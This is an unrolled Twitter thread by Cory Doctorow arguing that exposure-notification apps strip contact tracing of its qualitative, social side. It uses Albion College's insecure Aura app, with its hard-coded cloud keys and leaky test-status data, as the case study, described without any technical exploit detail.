In the early days of the pandemic, the term "contact tracing" vaulted into the public consciousness: that's the shoe-leather- and labor-intensive process whereby skilled heath experts establish a personal rapport with infected people to establish who they had contact with.

1/
For both good reasons (the scale of the pandemic) and bad ones (tech's epistemological blindness, which insists that all social factors can be ignored in favor of quantifiable ones), there was interest in automating this process and "exposure notification" was born.

2/
The difference is that exposure notification tells you whether your device was near another device whose owner is sick. It doesn't tell you about the circumstances - like, was it one of the people at that eyeball-licking party? Or someone in the next car in a traffic jam?

3/
Exposure notification vaporizes qualitative elements of contact tracing, leaving behind just a quantitative residue of unknown value. There are two big problems with this: first, it might just not be very useful (that's what they learned in Iceland):

https://pluralistic.net/2020/05/12/evil-maid/#fjords

4/
The thing is, contact tracing is high-touch/low-tech because it is a social science intervention. Social scientists have always understood that if you only gather the data that's easy to reach, you'll come to bad conclusions skewed by defects in your collection.

6/
A canonical text on this is Clifford Geertz's "Thick Description," where he describes an anthropologist trying to figure out why a subject just winked: is it flirting? Dust in the eye? Something else? The only way to know is to ask: you can't solve this with measurement.

7/
To a first approximation, all the important stuff in our world has an irreducible, vital qualitative dimension. Take copyright exemptions: fair use rules are deliberately qualitative ("Is your use transformative in a way that comments on or criticizes the work it uses?").

8/
These are questions that reflect policy priorities: in the words of the Supreme Court, fair use is the "escape valve" for the First Amendment, the thing that squares exclusive rights for authors with the public's right to free expression.

9/
But the tech and entertainment industry have spent decades trying to jettison this in favor of a purely quantitative measure: it's not fair use if your image incorporates more than X pixels from another, or if your video or sound has more than Y seconds from another work.

10/
This is idiotic. Solving automation challenges by declaring the non-automatable parts to be unimportant is how we get self-driving car assholes saying, "We just need to tell people that they're not allowed to act unpredictably in public."

11/
All of this is a leadup to the story of @Q3w3e3, an anonymous student at Michigan's @albioncollege, a private uni that reopened after insisting that all students must install a proprietary exposure notification app before returning to campus to lick each other's eyeballs.

13/
Albion paid some grifters to develop this app. Because of course they did. The app is called Aura, and it was created by a company called "Nucleus Careers."

14/
If you're thinking that's a weird name for a public health development company, you're right. They're a recruiting firm, founded this year, "with no apparent history or experience in building or developing healthcare apps."

https://techcrunch.com/2020/08/19/coronavirus-albion-security-flaws-app/

15/
Aura is predictably terrible. As @Q3w3e3 discovered when they audited it, the app stores all the students' location data in an Amazon storage bucket, and comes with the keys to access that data hard-coded into the app.

16/
The app also allows attackers to trivially discover the test status of any registered user. @Techcrunch discovered this bug and hypothesizes that they could get the health data for 15,000 people this way. Did someone say #HIPAA?

17/
Nucleus Careers refused to talk with Techcrunch's @zackwhittaker about this beyond a few glomarish nonstatements. But the school administration is standing behind the app, threatening to expel students who don't use it.

18/
And this brings us back to the disutility of the denatured quantitative residue of the thick, qualitative process of contact tracing. Many of the students who have the most at risk from using the app are also at the highest risk of contracting the disease.

19/
People struggling with addiction, queer kids who aren't out and have secret partners, people engaged in survival sex-work are all at higher risk of exposure, and they also have the biggest reason NOT to use the app, lest it leak their secrets.

20/
These are the people who you absolutely WANT to include in public health efforts, but that can only happen through noncoercive, personal, high-trust, low-tech interventions.

21/
In other words, Aura isn't just technologically inept, it's also epidemiologically inept. The cliche that "you treasure what you measure" could not be more applicable here.

22/
Look, these students shouldn't even be on campus. Obviously. And even a good contact tracing system would probably mostly serve as a postmortem for analyzing the inevitable conflagration of infection incoming in 3...2...1

23/
But Albion is still a fascinating case-study in the lethal incoherence of the contempt of both managerial and technology circles for "human factors."

At the very least, we should ensure that the lives they will squander through their hubris aren't totally wasted.

eof/
You can follow @doctorow.
Tip: mention @twtextapp on a Twitter thread with the keyword “unroll” to get a link to it.

Latest Threads Unrolled: